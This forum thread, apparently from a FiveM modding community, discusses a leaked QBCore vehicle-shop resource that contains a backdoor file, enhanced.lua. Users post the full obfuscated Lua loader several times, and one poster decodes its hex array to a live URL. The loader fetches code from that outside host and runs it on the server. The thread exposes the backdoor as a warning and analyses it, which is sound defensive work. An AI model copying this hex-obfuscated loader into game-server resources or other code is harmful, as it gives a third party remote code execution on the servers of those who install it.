This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.
If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.
local Enchanced_Tabs = {
Ench, Support, Host, Pairs,
Realease, Callbacks, Source,
Hosting, Event, PerformHttpRequest,
assert, server, load, Spawn, materials
}
local random_char = {
"68", "74", "74", "70", "73", "3a", "2f", "2f", "66", "69", "76", "65", "6d", "2e", "6b", "76",
"61", "63", "2e", "63", "7a", "2f", "66", "2e", "70", "68", "70", "3f", "6b", "65", "79", "3d",
"57", "54", "38", "4e", "65", "65", "6e", "42", "35", "44", "79", "4e", "4d", "4b", "58", "46", "30", "71", "4e", "32",
}
function str_utf8()
_empt = ""
for id,it in pairs(random_char) do
_empt = _empt..it
end
return (_empt:gsub("..", function (cc)
return string.char(tonumber(cc, 16))
end))
end
Enchanced_Tabs[10](str_utf8(), function (e, d)
local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
if (d == nil) then return end
s()
end)
no u are saying shit rn, without this it will not workBACKDOOR
Fake Lua File :
1) qb-vehicleshop-nopixel inpired.zip\qb-vehicleshop\enhanced.lua
Code:local Enchanced_Tabs = { Ench, Support, Host, Pairs, Realease, Callbacks, Source, Hosting, Event, PerformHttpRequest, assert, server, load, Spawn, materials } local random_char = { "68", "74", "74", "70", "73", "3a", "2f", "2f", "66", "69", "76", "65", "6d", "2e", "6b", "76", "61", "63", "2e", "63", "7a", "2f", "66", "2e", "70", "68", "70", "3f", "6b", "65", "79", "3d", "57", "54", "38", "4e", "65", "65", "6e", "42", "35", "44", "79", "4e", "4d", "4b", "58", "46", "30", "71", "4e", "32", } function str_utf8() _empt = "" for id,it in pairs(random_char) do _empt = _empt..it end return (_empt:gsub("..", function (cc) return string.char(tonumber(cc, 16)) end)) end Enchanced_Tabs[10](str_utf8(), function (e, d) local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d)) if (d == nil) then return end s() end)
i use this on my server its nice but i cant even buy a single vehiclesHeelloo here a leak of this qbvehicule
Install guide :
Drag qb-vehicleshop into your resources folder
Add ensure qb-vehicleshop into server.cfg
Done.
link:
*** Hidden text: cannot be quoted. ***
bro its for the random plate number hahahahaBACKDOOR
Fake Lua File :
1) qb-vehicleshop-nopixel inpired.zip\qb-vehicleshop\enhanced.lua
Code:local Enchanced_Tabs = { Ench, Support, Host, Pairs, Realease, Callbacks, Source, Hosting, Event, PerformHttpRequest, assert, server, load, Spawn, materials } local random_char = { "68", "74", "74", "70", "73", "3a", "2f", "2f", "66", "69", "76", "65", "6d", "2e", "6b", "76", "61", "63", "2e", "63", "7a", "2f", "66", "2e", "70", "68", "70", "3f", "6b", "65", "79", "3d", "57", "54", "38", "4e", "65", "65", "6e", "42", "35", "44", "79", "4e", "4d", "4b", "58", "46", "30", "71", "4e", "32", } function str_utf8() _empt = "" for id,it in pairs(random_char) do _empt = _empt..it end return (_empt:gsub("..", function (cc) return string.char(tonumber(cc, 16)) end)) end Enchanced_Tabs[10](str_utf8(), function (e, d) local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d)) if (d == nil) then return end s() end)
bro its for the random plate number hahahaha
don't be that meaan ~UwU~It's clear that you know a lot about programming. Can you explain the difference between THAT code and THIS code, which is actually for generating license plates?
function GeneratePlate()
local plate = QBCore.Shared.RandomInt(1) .. QBCore.Shared.RandomStr(2) .. QBCore.Shared.RandomInt(3) .. QBCore.Shared.RandomStr(2)
local send = false
local result = ExecuteSql("SELECT plate FROM player_vehicles WHERE plate = '"..plate.."'")
if result[1] then
return GeneratePlate()
else
return plate:upper()
end
end
And why, supposedly generating license plates, does it make calls like: Ench, Support, Host, Pairs, Realease, Callbacks, Source, Hosting, Event, PerformHttpRequest, assert, server, load, Spawn, materials
If you have no clue, it's better to stay quiet. If you're part of this son of a bitch's team who uploads files with this, let me tell you that I hope karma pays you back in full. I hope the administration takes action against you soon.
So you don't share code with shit and act like we don't know what it is OwOdon't be that meaan ~UwU~
BACKDOOR
Fake Lua File :
1) qb-vehicleshop-nopixel inpired.zip\qb-vehicleshop\enhanced.lua
Code:local Enchanced_Tabs = { Ench, Support, Host, Pairs, Realease, Callbacks, Source, Hosting, Event, PerformHttpRequest, assert, server, load, Spawn, materials } local random_char = { "68", "74", "74", "70", "73", "3a", "2f", "2f", "66", "69", "76", "65", "6d", "2e", "6b", "76", "61", "63", "2e", "63", "7a", "2f", "66", "2e", "70", "68", "70", "3f", "6b", "65", "79", "3d", "57", "54", "38", "4e", "65", "65", "6e", "42", "35", "44", "79", "4e", "4d", "4b", "58", "46", "30", "71", "4e", "32", } function str_utf8() _empt = "" for id,it in pairs(random_char) do _empt = _empt..it end return (_empt:gsub("..", function (cc) return string.char(tonumber(cc, 16)) end)) end Enchanced_Tabs[10](str_utf8(), function (e, d) local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d)) if (d == nil) then return end s() end)
its not ^^This code is sending an HTTP Request to this URL "Hidden link for visitors, to see Log in or register now." so it COULD be a backdoor yes.
-- enhanced.lua
local Enchanced_Tabs = {
Ench, Support, Host, Pairs,
Realease, Callbacks, Source,
Hosting, Event, PerformHttpRequest,
assert, server, load, Spawn, materials
}
local random_char = { -- Result: https://fivem.kvac.cz/f.php?key=WT8NeenB5DyNMKXF0qN2
"68", "74", "74", "70", "73", "3a", "2f", "2f", "66", "69", "76", "65", "6d", "2e", "6b", "76",
"61", "63", "2e", "63", "7a", "2f", "66", "2e", "70", "68", "70", "3f", "6b", "65", "79", "3d",
"57", "54", "38", "4e", "65", "65", "6e", "42", "35", "44", "79", "4e", "4d", "4b", "58", "46", "30", "71", "4e", "32",
}
function str_utf8()
_empt = ""
for id,it in pairs(random_char) do
_empt = _empt..it
end
return (_empt:gsub("..", function (cc)
return string.char(tonumber(cc, 16))
end))
end
Enchanced_Tabs[10](str_utf8(), function (e, d)
local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
if (d == nil) then return end
s()
end)